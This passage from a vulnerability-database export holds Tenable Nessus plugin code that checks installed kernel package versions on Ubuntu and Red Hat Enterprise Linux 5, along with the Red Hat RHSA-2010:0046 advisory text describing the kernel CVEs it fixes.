Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-doc-2.6.15\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-386\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-686\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-generic\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-k8\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-amd64-xeon\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-headers-2.6.15-55-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-386\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-686\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-generic\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-k8\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-amd64-xeon\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-image-2.6.15-55-server\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"linux-source-2.6.15\", pkgver:\"2.6.15-55.82\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-doc-2.6.24\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-386\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-generic\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-openvz\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-rt\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-server\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-virtual\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-27-xen\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-386\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-generic\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-lpia\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-lpiacompat\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-openvz\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-rt\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-server\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-virtual\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-27-xen\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-386\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-generic\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-server\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-27-virtual\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-source-2.6.24\", pkgver:\"2.6.24-27.65\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-doc-2.6.27\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-17\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-17-generic\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-17-server\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-17-generic\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-17-server\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-17-virtual\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-source-2.6.27\", pkgver:\"2.6.27-17.45\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-doc-2.6.28\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-headers-2.6.28-18\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-headers-2.6.28-18-generic\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-headers-2.6.28-18-server\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-generic\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-lpia\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-server\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-versatile\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-image-2.6.28-18-virtual\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"linux-source-2.6.28\", pkgver:\"2.6.28-18.59\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-doc\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-ec2-doc\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-ec2-source-2.6.31\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-386\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-generic\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-generic-pae\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-19-server\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-304\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-304-ec2\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-386\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-generic\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-generic-pae\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-lpia\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-server\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-19-virtual\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-211-dove\", pkgver:\"2.6.31-211.22\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-211-dove-z0\", pkgver:\"2.6.31-211.22\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-304-ec2\", pkgver:\"2.6.31-304.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.31-19.56\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-source-2.6.31\", pkgver:\"2.6.31-19.56\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc / linux-doc-2.6.15 / linux-doc-2.6.24 / linux-doc-2.6.27 / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:59", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user could send a specially crafted IOCTL request that would cause a denial of service or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on memory, fuse_put_request() could dereference an invalid pointer, possibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243 update introduced two flaws in the routing implementation. If an attacker was able to cause a large enough number of collisions in the routing hash table (via specially crafted packets) for the emergency route flush to trigger, a deadlock could occur. Secondly, if the kernel routing cache was disabled, an uninitialized pointer would be left behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the do_coredump() function. A local attacker able to guess the file name a process is going to dump its core to, prior to the process crashing, could use this flaw to append data to the dumped core file. This issue only affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable set to 2, the core file will not be recorded if the file already exists. For example, core files will not be overwritten on subsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems, 32-bit processes could access and read certain 64-bit registers by temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV) support in the qla2xxx driver, resulting in two new sysfs pseudo files, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'. These two files were world-writable by default, allowing a local user to change SCSI host attributes. This flaw only affects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The 'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/') had world-writable permissions. This could allow local, unprivileged users to change the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver used for OHCI compliant IEEE 1394 controllers. A local, unprivileged user with access to /dev/fw* files could issue certain IOCTL calls, causing a denial of service or privilege escalation. The FireWire modules are blacklisted by default, and if enabled, only root has access to the files noted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the HFS file system implementation. This could lead to a denial of service if a user browsed a specially crafted HFS file system, for example, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from www.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update / index.html\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2018-12-20T00:00:00", "id": "REDHAT-RHSA-2010-0046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44062", "published": "2010-01-20T00:00:00", "title": "RHEL 5 : kernel (RHSA-2010:0046)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0046. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44062);\n script_version (\"1.41\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_bugtraq_id(36576, 37019, 37068, 37069, 37339, 37806);\n script_xref(name:\"RHSA\", value:\"2010:0046\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2010:0046)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user\ncould send a specially crafted IOCTL request that would cause a denial\nof service or, possibly, privilege escalation. (CVE-2009-3080,\nImportant)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer,\npossibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to\nleverage a use-after-free of locked, asynchronous file descriptors to\ncause a denial of service or privilege escalation. (CVE-2009-4141,\nImportant)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an\nattacker was able to cause a large enough number of collisions in the\nrouting hash table (via specially crafted packets) for the emergency\nroute flush to trigger, a deadlock could occur. Secondly, if the\nkernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing,\ncould use this flaw to append data to the dumped core file. This issue\nonly affects systems that have '/proc/sys/fs/suid_dumpable' set to 2\n(the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With\nsuid_dumpable set to 2, the core file will not be recorded if the file\nalready exists. For example, core files will not be overwritten on\nsubsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910,\nModerate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo\nfiles, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and\n'vport_delete'. These two files were world-writable by default,\nallowing a local user to change SCSI host attributes. This flaw only\naffects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The\n'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/')\nhad world-writable permissions. This could allow local, unprivileged\nusers to change the behavior of the driver. (CVE-2009-3889,\nCVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci\ndriver used for OHCI compliant IEEE 1394 controllers. A local,\nunprivileged user with access to /dev/fw* files could issue certain\nIOCTL calls, causing a denial of service or privilege escalation. The\nFireWire modules are blacklisted by default, and if enabled, only root\nhas access to the files noted above by default. (CVE-2009-4138,\nModerate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in\nthe HFS file system implementation. This could lead to a denial of\nservice if a user browsed a specially crafted HFS file system, for\nexample, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update\n/ index.html\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-6304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-2910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3889\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4272\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-20536\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/20484\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0046\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0046\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-164.11.1.el5\")) 